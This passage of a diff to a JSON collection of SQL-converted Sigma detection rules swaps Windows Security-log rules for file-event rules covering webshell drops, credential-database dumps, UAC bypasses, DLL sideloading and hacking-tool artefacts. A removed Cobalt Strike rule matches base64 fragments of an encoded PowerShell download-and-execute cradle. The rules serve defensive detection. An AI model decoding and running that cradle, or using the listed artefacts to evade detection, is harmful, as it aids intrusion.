"ab6bffca-beff-4baa-af11-6733f296d57a", - "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ - "Administrators configuring new users." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 
eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1136.001" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' 
AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "VSSAudit Security Event Source Registration", - "id": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "status": "experimental", - "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
+ "Unknown" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND AuditSourceName = 'VSSAudit' AND EventID IN ('4904', '4905'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_vssaudit_secevent_source_registration.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - 
"id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1070.001" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "External Disk Drive Or USB Storage Device", - "id": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", - "author": "Keith Wright", + "description": 
"Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate administrative activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '6416' AND ClassName = 'DiskDrive') OR DeviceDescription = 'USB Mass Storage Device'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" ], - "filename": "win_security_external_device.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", - "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "status": "test", + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Software installation ISO files" + "Cases in which a user mounts an image file for legitimate reasons" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE '%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking 
(UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "status": "test", - "description": "Detects handle requests and access operations to specific 
registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "User Added to Local 
Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", - "attack.persistence", - "attack.t1098" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": 
